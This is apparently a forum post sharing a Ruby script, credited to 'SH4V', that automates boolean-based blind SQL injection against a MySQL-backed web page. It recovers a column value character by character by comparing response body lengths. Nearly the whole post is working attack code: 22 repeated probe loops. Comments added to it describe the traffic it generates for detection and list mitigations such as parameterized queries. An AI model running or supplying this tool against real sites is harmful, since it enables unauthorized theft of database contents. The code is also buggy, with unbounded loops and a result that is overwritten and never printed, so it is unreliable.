Nytro

[ruby] Rblind SQL Injection tool


Posted
#MySQL Blind Injection Tool
#Coder => SH4V
#n3t-datagrams.net
#
# What this script does: it appends a boolean condition to an existing request
# path and uses the length of the response body as a true/false signal to
# recover, one character at a time, the ASCII codes of the value returned by
# "SELECT <col> FROM <tab> WHERE id=1". It only works against an endpoint that
# concatenates a request parameter into a SQL statement.
#
# Traffic this produces (useful for detection and log review):
#   - GET requests whose query string contains
#     "+and+ascii(substring((SELECT+...+from+...+where+id=1),<pos>,1))=<n>"
#     with <n> counting up by one on consecutive requests and <pos> going 1..22.
#   - Requests are sequential with no delay, a fresh Net::HTTP object per probe,
#     and no headers set by the script, so Net::HTTP's default User-Agent
#     applies. Net::HTTP.new(host) with no port uses plain HTTP on port 80.
#   - The request volume is high and bursty from a single client: one request
#     per candidate value per character.
#
# Mitigation is at the application: bind request parameters with prepared or
# parameterized statements, validate numeric ids as integers, and run the
# application's database account with least privilege. Rate limiting and
# pattern-based filtering reduce noise but do not remove the flaw.
require 'net/http'
# Interactive inputs. The prompts are Spanish: "columna" = column, "tabla" = table.
puts "host:"
host=gets.chomp
# "extension" is used unchanged as the beginning of the request path below;
# presumably the page path plus a query string ending in the injectable
# parameter value -- confirm against how the author invoked it.
puts "extension:"
ext=gets.chomp
puts "columna:"
col=gets.chomp
puts "tabla:"
tab= gets.chomp

# --- Position 1 -------------------------------------------------------------
# num is a String so that String#succ ("0" -> "1" -> ... -> "9" -> "10") can be
# used as the counter.
num="0"
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
http= Net::HTTP.new(host)
# corp1: response body for the probe "...=0".
corp1=http.get("#{url}")
corp1=corp1.body
# corp2: same URL with "333" appended, i.e. "...=0333". MySQL's ASCII() returns
# at most 255, so this comparison cannot be true; its body is the reference
# "condition false" page.
corp2=http.get("#{url}333")
corp2=corp2.body
# Only the body lengths are compared, never the content. Pages whose length
# varies between identical requests make this signal unreliable.
lon1=corp1.length
lon2=corp2.length

# Keep incrementing the candidate value while the response has the same length
# as the "false" reference. The loop ends on the first response of a different
# length; num then holds the candidate that changed the page.
# NOTE(review): there is no upper bound on num and no error handling; if no
# candidate changes the body length the loop never terminates.
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

# Per-round epilogue, repeated after every position below: store the found
# value, then reset lon1 to the reference length and num to "0" so the next
# loop starts again.
# NOTE(review): res is re-created with String.new on every round, so it only
# ever holds the latest value, and nothing in the visible listing prints it.
res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 2: same probe loop, substring offset 2 -------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 3 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 4 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 5 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 6 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 7 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 8 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 9 ---------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 10 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 11 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 12 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 13 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 14 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 15 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 16 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 17 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 18 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 19 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 20 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 21 --------------------------------------------------------------
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

# --- Position 22 --------------------------------------------------------------
# The listing stops after this loop: this round has no epilogue, and no code in
# view stores or prints the value found here (the post may be truncated).
while lon1 == lon2
num=num.succ
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
lon1=corp1.length
end
